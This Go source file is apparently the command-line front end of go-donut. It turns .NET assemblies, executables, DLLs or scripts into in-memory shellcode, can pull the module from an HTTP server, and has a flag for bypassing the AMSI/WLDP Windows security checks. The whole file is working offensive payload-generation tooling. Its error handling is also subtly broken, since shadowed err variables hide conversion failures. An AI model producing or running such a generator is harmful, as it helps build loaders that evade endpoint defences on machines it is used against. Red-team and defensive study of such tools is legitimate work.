package main

import (
	"flag"
	"io/ioutil"
	"log"
	"os"
	"strings"

	"github.com/Binject/go-donut/donut"
)

func main() {

	var srcFile, dstFile, url, archStr, className, methodName, runtime, appDomain, params string
	var noCrypto, dotNet bool
	var bypass int

	flag.StringVar(&srcFile, "f", "", ".NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.")
	flag.StringVar(&url, "u", "", "HTTP server that will host the donut module.")
	flag.StringVar(&archStr, "a", "x84", "Target Architecture: x32, x64, or x84 (default, x32+x64)")
	flag.IntVar(&bypass, "b", 3, "Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)")
	flag.StringVar(&dstFile, "o", "payload.bin", "Output file. Default is payload.bin")

	flag.BoolVar(&dotNet, "dotnet", false, ".NET Mode, set true for .NET exe and DLL files (autodetect not implemented)")

	flag.StringVar(&className, "c", "", "<namespace.class> Optional class name.  (required for .NET DLL)")
	flag.StringVar(&methodName, "m", "", "<method | api>    Optional method or API name for DLL. (method is required for .NET DLL)")
	flag.StringVar(&params, "p", "", "<arg1,arg2...>    Optional parameters or command line, separated by comma or semi-colon.")
	flag.StringVar(&runtime, "r", "", "<version>	CLR runtime version.")
	flag.StringVar(&appDomain, "d", "", "<name>		AppDomain name to create for .NET. Randomly generated by default.")

	flag.BoolVar(&noCrypto, "nocrypto", false, "UNSAFE! Disables all crypto and randomness for testing only")
	flag.Parse()

	var donutArch donut.DonutArch
	switch strings.ToLower(archStr) {
	case "x32":
		donutArch = donut.X32
	case "x64":
		donutArch = donut.X64
	case "x84":
		donutArch = donut.X84
	default:
		log.Fatal("Unknown architecture provided")
	}

	config := new(donut.DonutConfig)
	config.Arch = donutArch
	config.NoCrypto = noCrypto

	if url == "" {
		config.InstType = donut.DONUT_INSTANCE_PIC
	} else {
		config.InstType = donut.DONUT_INSTANCE_URL
	}

	config.DotNetMode = dotNet
	config.Parameters = params
	config.Runtime = runtime
	config.URL = url
	config.Class = className
	config.Method = methodName
	config.Domain = appDomain
	config.Bypass = bypass

	var err error
	if srcFile == "" {
		if url == "" {
			log.Fatal("No source URL or file provided")
		}
		payload, err := donut.ShellcodeFromURL(url, config)
		if err == nil {
			err = ioutil.WriteFile(dstFile, payload.Bytes(), 0644)
		}
	} else {
		payload, err := donut.ShellcodeFromFile(srcFile, config)
		if err == nil {
			f, err := os.Create(dstFile)
			if err != nil {
				log.Fatal(err)
			}
			defer f.Close()
			if _, err = payload.WriteTo(f); err != nil {
				log.Fatal(err)
			}
		}
	}
	if err != nil {
		log.Println(err)
	} else {
		log.Println("Done!")
	}
}
